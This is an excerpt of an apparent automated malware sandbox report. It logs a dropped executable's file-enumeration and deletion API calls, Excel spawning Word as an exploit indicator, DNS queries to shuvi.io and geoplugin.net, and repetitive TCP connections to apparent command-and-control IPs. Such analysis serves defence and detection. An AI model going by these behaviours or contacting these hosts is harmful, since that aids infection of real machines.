                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_012CF021
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_012CF47F
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_012C3833
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_012C3B56
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_012CBD48
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: shuvi.io
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
